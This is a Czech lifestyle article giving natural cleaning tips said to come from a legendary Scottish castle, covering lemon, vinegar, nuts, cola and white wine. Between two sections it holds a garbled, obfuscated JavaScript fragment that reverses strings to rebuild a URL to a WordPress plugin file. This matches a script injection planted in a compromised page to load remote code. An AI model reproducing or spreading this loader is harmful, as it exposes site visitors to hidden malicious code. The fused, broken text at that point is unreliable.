FACESTARŽivotní stylJAK SE UKLÍZÍ NA LEGENDÁRNÍM HRADĚ VE SKOTSKU? BEZ CHEMIE A HRAD...

JAK SE UKLÍZÍ NA LEGENDÁRNÍM HRADĚ VE SKOTSKU? BEZ CHEMIE A HRAD ZÁŘÍ ČISTOTOU! INSPIRUJTE SE

Síla citronu

Síla citronu

Citronová šťáva je jedním z nejúčinnějších čisticích prostředků již po staletí. Lze ji používat k odstranění rzi (zředěnou trochou vody), skvrn na plastových površích (jako jsou kuchyňská prkénka apod.), a dokonce i na skvrny na kobercích, které neodstraníte jedlou sodou. Zkuste rozříznout citron a použít jej na nerezové kohoutky. Uvidíte, jak budou nablýskané. Do prostředku na mytí nádobí přidejte jednu nebo dvě kapky citronového éterického oleje a nádobí se bude také blýskat čistotou. Také zkuste vymačkat trochu citronové šťávy do myčky nádobí. Skvělý čisticí prostředek je také směs citronové šťávy a jedlé sody. Citronová šťáva zesvětluje a soda odstraňuje nejen špínu, ale také zápach. Zkuste tímto prostředkem čistit spáry mezi obklady.

andflickr.com/SuperDewa

Jak na skvrny na dřevě

Máte na dřevěném stole kolečka od skleniček a hrníčků s nápoji? Betty nedá dopustit na rozpůlený para ořech. Zkuste jím chvíli potírat suchý dřevěný povrch, kde voda zanechala stopy. Podobně může fungovat i trocha majonézy na hadříku.

Ocet, ocet a zase ocet

Jako většina profesionálů má i Betty v zásobě bílý ocet. Octem vyčistíte sklo a okna. Aby na nich nezůstaly šmouhy, použijte noviny a okna jimi přejeďte v krouživých pohybech.
Betty také doporučuje ocet zředěný vodou na dřevěný nábytek. Omyjte jej roztokem a nechte přes noc uschnout. Pak na dřevo aplikujte kvalitní leštidlo nebo olej.

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandfru.com/“>fabandfru.com

Cola jako čisticí prostředek?!

Možná už se coly nenapijete, až si přečtete tuto radu, ale vaše WC vám poděkuje. Cola pomůže odstranit vodní kámen – vylijte do WC láhev coly  a nechte hodinu působit, pak spláchněte.

Sklenku bílého vína, prosím

To víno ovšem není pro vás. Jestliže se vám nedaří odstranit vodní kámen a skvrny ze skleněných dveří u sprchového koutu, pomůže sklenka bílého vína. Namočte hadřík do vína a dveře jím umyjte. Skvrny nadobro zmizí. Pak můžete sklo nablýskat zředěným octem. Teď, když všechno víte, můžete se rovnou pustit do práce!

Související články